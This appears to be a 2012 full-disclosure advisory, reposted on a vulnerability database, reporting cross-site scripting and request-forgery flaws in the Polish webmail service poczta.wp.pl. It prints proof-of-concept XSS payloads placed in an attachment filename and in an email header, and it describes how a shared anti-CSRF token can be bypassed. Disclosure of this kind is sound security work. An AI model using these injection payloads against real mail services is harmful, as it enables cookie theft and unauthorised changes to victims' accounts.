Vulners
Lucene search
Wirtualna Polska S.A. (WP) XSS / CSRF
`Poczta.WP Multiple vulnerabilities full disclosure security paper
Author: Jakub Zoczek [zoczus(x)gmail.com]
0x01 Intro
----------
Wirtualna Polska S.A. (WP) is one of the largest Polish web portals.
Their email service (poczta.wp.pl) is affected by multiple cross-site
scripting vulnerabilities and also one, almost fixed cross-site
request forgery bug. After long time of waiting - I got a
non-professional answer from Customer Service Manager of WP, so I
decided to post all my research here. Thus...
0x02 XSS in mail attachments.
----------
Reported: 10/10/2012
State: Fixed
Proof Of Concept:
For example - jpeg picture with filename:
sowa oraz "> inject <img src="boom.jpg"
onerror="alert(document.cookie);"> hhh.jpg
..sent as e-mail attachment.
Result:
http://q-x.ath.cx/~zoczus/poc/wp/wpxss1.png
0x03 XSRF in AntyHack and AntySpam fitler (adding to white list)
----------
Reported: 24/11/2012
State: "Fixed"
Proof Of Concept:
http://q-x.ath.cx/~zoczus/poc/wp/wp-xsrf.txt
Result:
http://q-x.ath.cx/~zoczus/poc/wp/xsrf-wp1.jpg
http://q-x.ath.cx/~zoczus/poc/wp/xsrf-wp2.jpg
0x04 XSRF in AntyHack and AntySpam fitler - bypassing 'fix' ;)
----------
Reported: 04/12/2012
State: Not fixed
Proof Of Concept:
Additional info for 0x03 - as I supposed, WP used the token in a white
list form (every once in a while generated md5 of something). The
problem is, that the token value is probably the same for each user.
For different mail accounts, different browsers, different IP
addresses - token is the same... Bypassing this protection seems to
be quite simple.
http://q-x.ath.cx/~zoczus/poc/wp/xsrf-bypass1.png
http://q-x.ath.cx/~zoczus/poc/wp/xsrf-bypass2.png
0x05 XSS in mail headers
----------
Reported: 04/12/2012
State: Not fixed
Proof Of Concept:
Return-Path: <[email protected]>
Delivered-To: [email protected] (zoczus)
Received: (wp-smtpd mx.wp.pl 10088 invoked from network); 30 Nov 2012
16:04:58 +0100
Received: from emkei.cz ([46.167.245.118])
(envelope-sender <[email protected]>)
by mx.wp.pl (WP-SMTPD) with SMTP
for <[email protected]>; 30 Nov 2012 16:04:58 +0100
Received: by emkei.cz (Postfix, from userid 33)
id D4119D5807; Fri, 30 Nov 2012 16:04:57 +0100 (CET)
To: [email protected]
Subject:
From: "[email protected]" <[email protected]>
Head<img/src="a"/onerror="alert(document.location)">er: dont have spaces
X-Priority: 3 (Normal)
Importance: Normal
Errors-To: [email protected]
Reply-To: [email protected]
Content-Type: text/plain; charset=utf-8
Message-Id: <[email protected]>
Date: Fri, 30 Nov 2012 16:04:57 +0100 (CET)
X-WP-DKIM-Status: no signature (id: n/a)
X-WP-AV: skaner antywirusowy poczty Wirtualnej Polski S. A.
X-WP-SPAM: NO (UW) 0000010 [8Wph]
Dobre!
Result:
http://q-x.ath.cx/~zoczus/poc/wp/wp-xss2.png
0x06 The end. :)
----
Best regards,
Jakub Zoczek
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Dec 2012 00:00Current
0.2Low risk
Vulners AI Score0.2